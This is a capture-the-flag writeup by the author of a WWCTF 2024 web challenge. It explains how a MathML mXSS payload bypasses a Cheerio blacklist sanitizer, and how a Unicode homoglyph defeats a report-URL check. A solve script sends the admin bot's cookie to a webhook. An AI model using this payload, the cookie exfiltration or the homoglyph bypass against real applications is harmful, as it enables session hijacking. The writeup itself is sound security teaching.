SAAS MXSS challenge writeup from WWCTF 2024

Dec 1, 2024

Last updated on Dec 10, 2024

Description

I created this challenge for WWCTF 2024, where participants are tasked with identifying and exploiting two distinct vulnerabilities. The first involves bypassing a Cheerio-based server side HTML sanitizer to execute an XSS attack via an HTML input. The second requires leveraging a logical flaw in the report endpoint to achieve exploitation.

Challenge overview

Challenge description

By the end of the CTF, this challenge had only two solves. Kudos to Kabilan S for achieving the first blood and Infobahn for securing the second blood!

let’s check the remote applicaition here we can enter html in the text box and we can see it got reflected back in the HTML output.

SAAS frontend

lets check the javascript behind this application

async function sanitizeHTML() {
    const inputHTML = document.getElementById('html-input').value;
    if (inputHTML.length <= 75) {
        try {
            const response = await fetch('/api/sanitize', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ html: inputHTML })
            });

            const data = await response.json();

            if (data.html) {
                document.getElementById('sanitized-output').innerHTML = data.html;
            } else {
                document.getElementById('sanitized-output').textContent = `Error: ${data.error}`;
            }
        } catch (err) {
            document.getElementById('sanitized-output').textContent = `Failed to sanitize HTML: ${err.message}`;
        }
    } else {
        document.getElementById('sanitized-output').innerHTML = "<h1>Too Long</h1>";
    }
}
function sharePage() {
    const inputHTML = document.getElementById('html-input').value;
    const base64HTML = btoa(unescape(encodeURIComponent(inputHTML)));
    const newURL = `${window.location.origin + window.location.pathname}?html=${encodeURIComponent(base64HTML)}`;
    window.location.href = newURL
}
window.onload = () => {
    const urlParams = new URLSearchParams(window.location.search);
    const base64HTML = urlParams.get('html');
    if (base64HTML) {
        const decodedHTML = decodeURIComponent(escape(atob(base64HTML)));
        document.getElementById('html-input').value = decodedHTML;
        sanitizeHTML();
    }
}

Whenever you click the “Sanitize HTML” button, the sanitizeHTML function is triggered. This function first checks if the input is less than 75 characters. If it is, the HTML input is sent to /api/sanitize, and the response is set in the sanitized output using innerHTML.

We also have access to the source code here let’s check for more details

Challenge files

once you check docker-compose.yml you can see we have 2 services api and web

services:
  api:
    build:
      context: ./backend
    ports:
      - "5000"
    env_file: ".env"
    environment:
      - NODE_ENV=production
  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - "80:80"
    depends_on:
      - api

web is a nginx container serving html files from the frontend directory and routing the /api route to api service the api has the following code iam only wrting code which is relevant here

/* 
    imports and SETUP
*/

const blacklist = "a abbr acronym address applet area article aside audio b base bdi bdo big blink blockquote br button canvas caption center cite code col colgroup command content data datalist dd del details dfn dialog dir div dl dt element em embed fieldset figcaption figure font footer form frame frameset head header hgroup hr html iframe image img input ins kbd keygen label legend li link listing main map mark marquee menu menuitem meta meter multicol nav nextid nobr noembed noframes noscript object ol optgroup p output p param picture plaintext pre progress s samp script section select shadow slot small source spacer span strike strong sub summary sup svg table tbody td template textarea tfoot th thead time tr track tt u ul var video".split(" ")

const attrs = "onafterprint onafterscriptexecute onanimationcancel onanimationend onanimationiteration onanimationstart onauxclick onbeforecopy autofocus onbeforecut onbeforeinput onbeforeprint onbeforescriptexecute onbeforetoggle onbeforeunload onbegin onblur oncanplay oncanplaythrough onchange onclick onclose oncontextmenu oncopy oncuechange oncut ondblclick ondrag ondragend ondragenter ondragexit ondragleave ondragover ondragstart ondrop ondurationchange onend onended onerror onfocus onfocus onfocusin onfocusout onformdata onfullscreenchange onhashchange oninput oninvalid onkeydown onkeypress onkeyup onload onloadeddata onloadedmetadata onloadstart onmessage onmousedown onmouseenter onmouseleave onmousemove onmouseout onmouseover onmouseup onmousewheel onmozfullscreenchange onpagehide onpageshow onpaste onpause onplay onplaying onpointercancel onpointerdown onpointerenter onpointerleave onpointermove onpointerout onpointerover onpointerrawupdate onpointerup onpopstate onprogress onratechange onrepeat onreset onresize onscroll onscrollend onsearch onseeked onseeking onselect onselectionchange onselectstart onshow onsubmit onsuspend ontimeupdate ontoggle ontoggle(popover) ontouchend ontouchmove ontouchstart ontransitioncancel ontransitionend ontransitionrun ontransitionstart onunhandledrejection onunload onvolumechange onwebkitanimationend onwebkitanimationiteration onwebkitanimationstart onwebkitmouseforcechanged onwebkitmouseforcedown onwebkitmouseforceup onwebkitmouseforcewillbegin onwebkitplaybacktargetavailabilitychanged onwebkittransitionend onwebkitwillrevealbottom onwheel".split(" ")

const generateChallenge = () => {
    const data = crypto.randomBytes(16).toString('hex');
    script = `POW` // proof of work 
    return { script, data, difficulty: DIFFICULTY };
};

const sanitize = (html) => {
    const unsafe = cheerio.load(html);
    for (const tag of blacklist) {
        unsafe(tag, "body").remove();
    }
    unsafe('*').each((_, el) => {
        for (const attr of attrs) {
            unsafe(el).removeAttr(attr);
        }
    });
    return unsafe("body").html();

}
app.post('/api/sanitize', async (req, res) => {
    try {
        const { html } = req.body;
        if (html) {
            const sanitizedHTML = sanitize(html);
            res.json({ html: sanitizedHTML });
        } else {
            res.status(400).json({ error: 'No HTML provided' });
        }
    } catch (err) {
        console.log(err)
        res.status(500).json({ error: 'Something went wrong' });
    }

});

app.get('/api/report', (req, res) => {
    // send POW challenge
});

app.post('/api/report', async (req, res) => {
    const { data, nonce, urlToVisit, secretKey } = req.body;
    if (!data || nonce === undefined || urlToVisit === undefined || secretKey === undefined) {
        return res.status(400).json({ success: false, error: 'Invalid request format.' });
    }
    const difficulty = activeChallenges.get(data);
    if (!difficulty) {
        return res.status(400).json({ success: false, error: 'Challenge not found or expired.' });
    }
    const isValid = validateSolution(data, nonce, difficulty);
    if (isValid) {
        activeChallenges.delete(data);
        try {
            const context = await (await browser).createBrowserContext();
            const page = await context.newPage();
            // SET cookie
            if (urlToVisit.includes(CHALL_DOMAIN)) {
                if (secretKey !== ACCESSKEY) {
                    return res.status(403).json({ success: false, error: 'secretKey is invalid you can not report' });
                }
            }
            const url = new URL(urlToVisit)
            if (url.host !== CHALL_DOMAIN) {
                return res.status(400).json({ success: false, error: 'Given URL is out of scope' });
            }
            try {
                // Visit the page
                return res.json({ success: true, message: 'Admin verified your report.' });
            } catch (error) {
                // ERROR Handing
            }
        } catch (error) {
            // ERROR Handing
        }

    }
    return res.status(400).json({ success: false, error: 'Invalid solution.' });
});


app.listen(PORT, async () => {
    console.log(`SaAS running at http://localhost:${PORT}`);
});

Let’s examine the /sanitize endpoint. This endpoint processes the input by parsing it with cheerio, removing specific tags and attributes listed in the blacklist provided above.

Fortunately, the blacklist does not include the math tag, making it an excellent candidate for confusing parsers. Let’s explore some potential mXSS vectors using this tag.

before trying to solve this lets setup a test script to check our mxss vectors.the following code is used by me

const cheerio = require('cheerio');
const html =  "<test>hay</test>"
const $ = cheerio.load(html);
console.log($("body").html());

Identifying a Potential Payload

From the MXSS cheatsheet (available on SonarSource MXSS Cheatsheet), we can find potential payloads that could work around the blacklist. For instance, the following payload is a good candidate:

This payload triggers an alert on the browser due to the onerror of an img. However, some elements in this payload, like <table>, are blacklisted by the server. We need to refine this.

Refining the Payload

First, we simplify the payload by removing unnecessary elements, such as table with the id attribute, and test it again:

The cheerio parses this and transforms it into:

<math><mtext><mglyph><style><math><img src=x onerror=alert(1)></style></mglyph><table></table></mtext></math>

when you submit the following as input to the application This payload successfully triggers an alert in the browser, despite the server-side parsing removing certain elements like <table> at the end.

alert

From the source code, we know the goal is to steal the cookie. However, the challenge lies in the payload length restriction. To address this, we can use a well-known XSS trick to shorten the payload by leveraging eval(`'`+URL). Additionally, we have the ability to control the URL being sent to the bot, making this feasible.

Here’s the code that generates a link capable of sending the token to your endpoint.

import base64
import requests
webhook = "YOUR_WEB_HOOK"
payload = f"window.location='{webhook}'+btoa(document.cookie)"
encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
report_url = f"https://saas.wwctf.com/?html=PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D#'+eval(atob('{encoded_payload}'))"
print(report_url)

if you change the eval to alert you can see the payload in action.

We face a second issue when reporting: to make the bot visit our link, we must bypass the following checks. The urlToVisit is the URL we provide, and if it belongs to the challenge domain, we are required to supply a secretKey that matches the server-side randomly generated ACCESSKEY. Since there’s no way to know the secretKey, this check cannot be satisfied. If we provide a URL from any other domain, the second check will fail because it ensures the URL’s host matches the challenge domain. Additionally, redirects cannot be used.

Here’s the code snippet implementing these checks:

if (urlToVisit.includes(CHALL_DOMAIN)) {
    if (secretKey !== ACCESSKEY) {
        return res.status(403).json({ success: false, error: 'secretKey is invalid you can not report' });
    }
}
const url = new URL(urlToVisit)
if (url.host !== CHALL_DOMAIN) {
    return res.status(400).json({ success: false, error: 'Given URL is out of scope' });
}

However, there is a logical flaw in the implementation. The includes method behaves differently from the URL object. If you insert a Unicode character in the domain, such as using 𝙎 instead of s, the includes check will fail, but the URL object will normalize it back to s. This inconsistency allows you to bypass the check and submit the URL to the bot successfully.

final solve script

import hashlib
import time
from multiprocessing import Pool, cpu_count
import sys
def find_nonce(args):
    message, nonce_start, nonce_end, prefix = args
    for nonce in range(nonce_start, nonce_end):
        combined = f'{message}{nonce}'.encode()
        hash_result = hashlib.sha256(combined).hexdigest()
        if hash_result.startswith(prefix):
            return nonce
    return None

def proof_of_work(message):
    prefix = '0'*6
    nonce = 0
    num_processes = 1
    chunk_size = 1000000
    start_time = time.time()
    
    with Pool(processes=num_processes) as pool:
        while True:
            tasks = [
                (message, nonce + i * chunk_size, nonce + (i + 1) * chunk_size, prefix)
                for i in range(num_processes)
            ]
            results = pool.map(find_nonce, tasks)
            
            for result in results:
                if result is not None:
                    end_time = time.time()
                    nonce = result
                    print(f'Time taken: {end_time - start_time} seconds')
                    return nonce

            nonce += num_processes * chunk_size


if  __name__ == "__main__":
    print("Working....")
    data = "dae016e1c3d8fe84176a6d7691f57fdb" # get the pow data from /api/report
    nonce = proof_of_work(data)
    print(nonce)
    ############## The above code is for POW ################
    ############## SOLUTION code ################
    import base64
    import requests
    webhook = "WEBHOOK URL"
    payload = f"window.location='{webhook}'+btoa(document.cookie)"
    encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
    report_url = f"https://𝙎aas.wwctf.com/?html=PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D#'+eval(atob('{encoded_payload}'))"
    print(report_url)
    resp = requests.post("https://saas.wwctf.com/api/report", json={
        "secretKey": "asdsd",
        "urlToVisit": report_url,
        "nonce": nonce,
        "data":data
    })

    print(resp.text)

A request from bot

https://webhook.site/YOUR-ID/ZmxhZz13d2Z7SFRNTF9yMFVOZFRSMVBfZjByX3RIM19XMU5fNE5kX1MzUlYzUl81SUQzX0g3TUxfUzROMVQxWjRUSTBOXzFTX0I0RF8xRDM0fQ==

decoding the path you will get the flag wwf{HTML_r0UNdTR1P_f0r_tH3_W1N_4Nd_S3RV3R_5ID3_H7ML_S4N1T1Z4TI0N_1S_B4D_1D34}

the vulnability here is similar to CVE-2024-52595 which is a namespace confusion sanitizer bypass in python lxml-html-clean

Community solutions

Check out Kabin’s writeup, where he used a URL-encoded input like saas.wwctf%2ecom to bypass the report URL check.

Team Infobahn’s solution utilized the fact that xhr and style tags behave the same way when used in the MathML namespace. Additionally, within the MathML namespace, it is possible to load iframes.

Feel free to ping me on LinkedIn if you spot any inaccuracies in this blog.

Refrence

Check the following blogs to learn more about MXSS